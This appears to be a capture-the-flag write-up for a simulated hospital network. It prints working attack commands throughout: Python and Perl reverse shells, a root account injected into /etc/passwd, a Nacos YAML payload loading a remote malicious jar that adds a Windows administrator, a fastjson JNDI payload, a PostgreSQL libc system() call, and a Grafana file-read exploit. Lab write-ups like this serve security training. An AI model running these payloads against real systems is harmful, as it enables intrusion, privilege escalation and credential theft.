[[Simulation Target - Hospital]]#
Overview#
In this scenario, you will play the role of a penetration testing engineer sent to test the network security of a hospital. Your goal is to successfully gain access to all servers to assess the company's network security status. There are a total of 4 flags in this target, distributed across different target machines.
Target Architecture
Information Gathering#
The fscan scan yielded the following content:
There is a website and a heapdump file on port 8080, access the /actuator directory
http://39.99.225.90:8080/actuator
Visit the website and log in to the backend with weak credentials
Vulnerability Exploitation#
After logging into the backend, shiro is detected
Unable to brute-force the key, the previous heapdump file contains the key
algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES
Brute-force chain
Execute command
Generate memory shell, connect with Ant Sword
Privilege Escalation#
Look for files with SUID permissions, vim.basic can directly edit files as root
Reverse shell from Ant Sword to the cloud server
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
Need to upgrade to an interactive terminal.
python3 -c "import pty;pty.spawn('/bin/bash')"
script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset
xterm-256color
Modify /etc/passwd using vim.basic for privilege escalation
openssl passwd -1 -salt 123 123456
Generate password
Add an account to the /etc/passwd file
hacker:$1$123$7mft0jKnzzvAdU4t0unTG1:0:0:/root:/bin/bash
flag01#
After adding, switch to the newly added account using su, this server is web01, obtain the value of flag01
su hacker
Reference: https://cloud.tencent.com/developer/article/1711865
Internal Network Scanning#
Run fscan for scanning
172.30.12.236:8080 open
172.30.12.5:8080 open
172.30.12.6:445 open
172.30.12.6:139 open
172.30.12.6:135 open
172.30.12.236:22 open
172.30.12.5:22 open
172.30.12.236:8009 open
172.30.12.6:8848 open
[*] NetInfo
[*]172.30.12.6
[->]Server02
[->]172.30.12.6
[*] NetBios 172.30.12.6 WORKGROUP\SERVER02
[*] WebTitle http://172.30.12.5:8080 code:302 len:0 title:None Redirect URL: http://172.30.12.5:8080/login;jsessionid=AA88B536A2B3199D4BB9686F35367F34
[*] WebTitle http://172.30.12.5:8080/login;jsessionid=AA88B536A2B3199D4BB9686F35367F34 code:200 len:2005 title:Medical Management Backend
[*] WebTitle http://172.30.12.6:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[*] WebTitle http://172.30.12.236:8080 code:200 len:3964 title:Hospital Backend Management Platform
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypass
[+] PocScan http://172.30.12.5:8080 poc-yaml-spring-actuator-heapdump-file
Two assets were discovered as follows
http://172.30.12.6:8848 poc-yaml-alibaba-nacos poc-yaml-alibaba-nacos-v1-auth-bypass
http://172.30.12.236:8080 code:200 len:3964 title:Hospital Backend Management Platform
There is a nacos service on the internal network 172.30.12.6 with the default password nacos/nacos
http://172.30.12.236:8080
has a fastjson service
flag02#
Use venom to proxy the internal network, admin listens on the port, agent initiates the connection:
./admin_macos_x64 -lport 9999
./agent_linux_x64 -rhost x.x.x.x(vps ip) -rport 9999
Access the nacos application
http://172.30.12.6:8848/nacos/
Read the configuration file
datasource:
mysql:
url: jdbc:mysql://localhost:3306/test?useSSL=false&serverTimezone=UTC&allowPublicKeyRetrieval=true
username: root
password: P@ssWord!!!
In the rollback configuration file of db-config, you can see the malicious configuration jar package, the content is roughly as follows, initially thought it was to roll back to the following configuration, but after resetting the environment several times, testing found that it does not need to roll back, the following is the manual configuration file
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://172.30.12.5:802/yaml-payload.jar"]
]]
]
Use tools for exploitation
Need to compile the malicious payload, reference project: https://github.com/artsploit/yaml-payload
Just modify the content of AwesomeScriptEngineFactory.java, since the target is a windows machine, you can add an account, and the target server also has port 3389 open
public AwesomeScriptEngineFactory() {
try {
Runtime.getRuntime().exec("net user lca Lca@123 /add");
Runtime.getRuntime().exec("net localgroup administrators lca /add");
} catch (IOException e) {
e.printStackTrace();
}
}
Then compile it using Java 1.8, must use Java 1.8 to compile
javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .
Upload to the web01 server (the one with flag01), start a python service on web01, let web02 (172.30.12.6) download the malicious jar package, then use the tool NacosExploitGUI_v3.9 to send the request, the jar path is the path of the python started web service
java -jar NacosExploitGUI_v3.9.jar
web01 receives the request, indicating that 172.30.12.6 has downloaded the malicious payload, next is to verify whether the account has been successfully added
Set up a proxy on the local computer using proxifier, connect to 3389
Connection successful, obtain flag02, this server is web02
Nacos related vulnerabilities:
Nacos Internal Cluster Raft Deserialization Vulnerability
Nacos JRaft Hessian Deserialization Vulnerability Exploitation Tool
flag03#
Another machine has a fastjson vulnerability
To avoid going out of the network, start JNDI on 172.30.12.5 (web01)
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://localhost:1389/badNameClass",
"autoCommit":true
}
}
Need to enable lower-level proxy on yakit
Obtain flag03, this machine is web03
flag04#
To access the last machine from the local computer, a two-layer internal network proxy is needed. This machine has grafana+postgres services, and grafana has weak credentials, allowing direct login to the backend.
The grafana backend can execute postgres commands, reverse a low-privilege shell to the web03 server
CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
select system('perl -e \'use Socket;$i="172.30.54.179";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');
On web3, download https://github.com/A-D-Team/grafanaExp, use the above exp (CVE-2021-43798) to read the account password, then log in to the postgres account
./grafanaExp exp -u http://172.30.54.12.:3000/
Read the account password postgres@123, log in using psql
psql -h 172.30.54.12 -U postgres -W
postgres=# select version();
# Check that the administrator's password is in md5 format
postgres=# SHOW is_superuser;
Use hashcat to crack, the password for the root database is P@ssw0rd123
hashcat -w 4 -m 0 -a 0 hashfile.txt /usr/share/wordlists/rockyou.txt -O
Then log in with the root user, using the absolute path for psql
sudo /usr/local/postgresql/bin/psql
Input \?
to switch to command line, find flag04